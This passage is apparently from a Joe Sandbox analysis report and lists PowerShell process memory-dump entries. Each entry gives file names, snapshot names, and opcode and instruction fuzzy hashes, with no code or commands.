                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848f1b000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 57a73d48ca0f737987ef29656b4b46f1ade25d4fa25dca9a149d21b7dd0318e0
                                                                                                                                                                                                                                                                                      • Instruction ID: 9ef7383bfd2c9bd68ceb513ed353cac5cad38d3f36f971a7ffdb45c8c075fd8d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 57a73d48ca0f737987ef29656b4b46f1ade25d4fa25dca9a149d21b7dd0318e0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E591273092CA888FE749EF28C4896B5BBE1FF95351F14417EC08AC3196DB25EC46CB51
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3520439093.00007FF848DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DFD000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848dfd000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 16aa2b5bff82e9e9a78e863f662b6e3ee5634b626283ec298881ba90b4c58ce0
                                                                                                                                                                                                                                                                                      • Instruction ID: 9010e882d76a72d610ba113897bdb5307afb6838d29128dffb1d7c8136bee4c4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 16aa2b5bff82e9e9a78e863f662b6e3ee5634b626283ec298881ba90b4c58ce0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F41E83180EBC44FE7569B299C45A523FF0EF57260F1906DFD088CB5A3D725A84AC7A2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3529520592.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 49d58d7763811e171874b949e66b7e2e7b4779db6ae6ab4187a2017470e836d9
                                                                                                                                                                                                                                                                                      • Instruction ID: dc5b3f6a5b877f69ed45f2dd0bd6d1d01e761deadd50e81d1eeedeb930c9832d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 49d58d7763811e171874b949e66b7e2e7b4779db6ae6ab4187a2017470e836d9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A118E32B0D9198FDB59EB0CE4419F873E1EFA8761B1400BBD10AC71A2DB29EC56C785
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3529520592.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 448fc1e08d4b5db29c2dab2fff823330f4da42fd2b307ca2b315ff215e8e1409
                                                                                                                                                                                                                                                                                      • Instruction ID: ad82f8d91b71bdcc5bbac7e4c724964ecfcfde893a6adea8a8eb89b7c7df34c8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 448fc1e08d4b5db29c2dab2fff823330f4da42fd2b307ca2b315ff215e8e1409
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E118E32B0C9088FDB54EB0CE4419F8B7E1EF54364B5400ABD10AC71A3DB29EC55C795
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3525776659.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848f10000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                      • Instruction ID: 191617ceee889ec1b776a361fbb2d1250ce1ead809f4672e64413ffe75dfec08
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7201677111CB0C4FDB44EF0CE451AA5B7E0FB95364F10056EE58AC3695DB36E882CB45
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3529520592.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: e7edd209901f3e2893f5d5bc6a96af966cae25e431fe1eba45b8899dbd4bd2db
                                                                                                                                                                                                                                                                                      • Instruction ID: c22a7a5bf575f795bf10398961241c508bb6adc3c637ba9f52bfcb0741616011
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7edd209901f3e2893f5d5bc6a96af966cae25e431fe1eba45b8899dbd4bd2db
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 52F0B431A0C9058FD759EB0CE4044A473E0FF59360F1500BAE01DC71A3DB29EC408745
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000019.00000002.3529520592.00007FF848FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FE0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_25_2_7ff848fe0000_powershell.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 9ae97a8d8fd737ab28c7d74f785bcd9486956881b3810d3c4936efef4af6403b
                                                                                                                                                                                                                                                                                      • Instruction ID: 222751ec4fb05e36e8befe769d74d37b2eb345aa0d2d3dc6175970d995a203c3
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9ae97a8d8fd737ab28c7d74f785bcd9486956881b3810d3c4936efef4af6403b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF0B832A0CA448FD758EB0CE4448A8B3E0FF05320F0500BAE00ECB4A3DB2AEC608755